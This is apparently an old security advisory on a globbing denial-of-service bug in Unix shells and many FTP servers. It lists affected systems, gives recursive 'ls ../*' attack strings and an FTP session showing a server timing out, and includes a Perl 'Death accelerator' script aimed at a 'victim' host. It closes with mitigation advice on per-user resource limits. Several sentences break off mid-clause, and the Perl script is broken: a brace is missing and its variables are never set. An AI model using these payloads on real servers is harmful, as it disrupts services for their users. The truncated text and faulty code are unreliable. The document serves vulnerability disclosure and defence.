



    Wakko Ellington Warner-Warner III found following.  If You do:

        # ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*

    Wait a few minutes, let the disks churn (it never stops!)

    Break out of it...

        # vmstat
        cannot fork: no swap space
        # w
        cannot fork: no swap space

    Have fun hard-resetting your Sun  box...  We got the  same results
    as the original poster on Solaris 2.6 (a sparc 2 with 32Mb memory)
    and the same as Jason on a Linux system (Redhad 6.2, with  128Mb).
    On the Sol.2.6 system it would run until it gets a:

        # ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
        no stack space
        # uptime
        cannot fork: no swap space

    and it required a reboot  to free it up.   But only as root, as  a
    normal user we  got the same  as the linux  system (which was  the
    same as either root or a reqular user).

    On Linux Slackware 7.0 after some time You get Your shell  killed.
    On  FreeBSD  4.2  generic  there's  no  response from the box.  On
    OpenBSD 2.7 (with  softupdates) the hard  disk begin to  do a evil
    noise and  nothing happened  untill You  control-c the  ls after 4
    hours (486).   On NetBSD  1.5 the  shell will  stop responding  to
    commands.  On Mandrake 7.2,  and the system becomes very  unstable
    and freezes in the end.  You have to hard reset the computer.

    Proftpd  built-in  'ls'  command  has  a  globbing bug that allows
    remote denial-of-service.  Here's a simple exploit, tested on  the
    Proftpd site:

        $ ftp
        Name ( ftp
        230 Anonymous access granted, restrictions apply.
        Remote system type is UNIX.
        Using binary mode to transfer files.
        ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
        227 Entering Passive Mode (216,10,40,219,4,111).
        421 Service not available, remote server timed out. Connection closed

    That command takes 100% CPU time on the server.  It can lead  into
    an  easy  DOS  even  if  few  remote  simultanous  connections are

    Other FTP  servers may  be concerned  as well.   Here are  various
    - NetBSD FTP showed the same behavior than Proftpd,
    - Microsoft FTP showed the same behavior than Proftpd,
    - In an  ironic twist, PureFTPd  (of which you  are apparently the
      author),  is  indeed  vulnerable  to  this  globbing  bug, using
      variants of the string you previously posted.  Try:

        ls .*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/
        ls */.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/

    - BeroFTPD version 1.3.4 is also vulnerable.
    - Safe to say all BSD ftpd's are vunerable.
    - all Solaris boxes
    - ftpd-BSD-0.2.3-4 port for linux is also vulnerable
    - this to consume 100% of CPU cycles and 40% of Cobalt RaQ server's
      512MB of RAM (at the time I killed it), running ProFTPD 1.2.0pre9
      on Linux 2.2.14.
    - Winsock FTPD 3.00 pro and 2.41 (maybe prior) are vulnerable

    This is not just an ftpd issue, it's a shell expansion issue.  You
    can DoS  the affected  servers with  ls issued  from the  shell as
    shown above.

    Here are th the results with different shells:
    - tcsh  ran out of memory  after 2 or 3 minutes, used 100%  of the
            cpu  to  the  point  of  noticable delays in other running
    - csh   ran out of memory  after 5 or 6 minutes, used 100% of  the
            cpu but didn't seem to cause serious delays

    - bash  seg faulted after 6 minutes, didn't start using 100%%  cpu
            only 20  to 99,  after 5  mintes in  started hammering the
            disk and used WAY more than 100% cpu causing signification
            delays in other jobs

    - ksh   killed it after 20 minutes, used 100% of the cpu,  started
            using but not hammering the disk after 10 minutes

    Here is the sample exploit code:

    #!/usr/bin/perl -w

    # Death accelerator for FTP servers (C) Ninja 2001
    # This is for educational purposes only
    # All credits go to Gore, my old parakeet who c0des perl better than me
    # Just tweak the connections number to bring a swifter death to your machine
    # Ain't life a bitch ? Hehe...
    use Net::FTP;
    if($#ARGV==-1) {
    # Print help file
	    print ("\n Usage: $0 [victim] [port] [connections] \n");
    else {
	    print "Attacking $victim:$port with $conn connections\n";
	    for($i=0;$i<$conn;$i++) {
		    $ftp=Net::FTP->new("$victim", Port=>$port, Passive=>1);


    It's a simple resource starvation issue.  The _shell_ process will
    keep eating memory as it tries to do the glob on the command line.
    Since root is not subject to resource limits, the shell will  keep
    eating memory until  you are out  of swap, and  apparently, if you
    needed to cold restart the  box, your Solaris setup does  not like
    to run out of swap.  So, this is just a shell expansion that  gets
    a little carried away.   ls ../* expands to parent  directory, all
    files ls ../*/../* expands to parent directory, all files,  parent
    directory, all files....nice little  loop if the parent  directory
    has a child (which it obviously does since we're in one).

    The machine will only crash if you've instructed it to allow  bash
    to allocate memory indefinitely.  Unless you trust your users  not
    to be  malicious or  incompetent you  should have  kernel-enforced
    limits in place to prevent this.

    WFTP released 3.00 R4 to fix this vulnerability.  [They now refuse
    to list any parameter list containing "/.."]

    Set   limits   on   userspace   processes,   in   e.g.   Red   Hat
    /etc/security/limits.conf and ensure that your limits reflect  the
    capabilities of the hardware.  Getting this perfect is very  hard,
    but getting it good enough to deter casual vandals or  thoughtless
    users is quite easy.

    It  is  arguable  that  the  FTP  daemon  is responsible for doing
    argument checking to prevent DOS  attacks, but bash can hardly  be
    held to the same standard.

    Except for the FTP daemons which  work in novel ways, this is  not
    even a denial of service attack.  Typically, the parent, listening
    daemon spawns a new process  for each control connection.   If the
    person who is connected to the daemon then uses the above "attack"
    they kill  their own  daemon.   They could  do the  same thing  by
    logging off.   The parent  daemon is  not affected  nor are  other
    users currently connected. (Assuming that there are sane  resource
    limits in place of course).

    What 'novel' daemons might be  affected by this?  Those  that have
    different user IDs not associated with different system user  IDs.
    In this  case, the  operating system  cannot differentiate between
    different  FTP  users,  thus  one  user  can  DoS  the  others  by
    exhausting shared  resources.   However, some  very clever daemons
    may have resource limitations per-user within their own user base.

    Before people start running around trying to filter 'ls' arguments
    in the  daemon, the  correct solution  to the  "problem" is proper
    resource  limitations  per  user  (there  are  undoubtably   other
    resource attacks  through an  FTP daemon  too).   For users at the
    operating  system   level,  most   OSes  have    resource-limiting
    capabilities, so it is just a matter of doing it.  The real  issue
    is fixing FTP daemons with their  own user bases that do not  have
    the  capability  to  impose  their  own  per-user resource limits.
    That's the only bug here.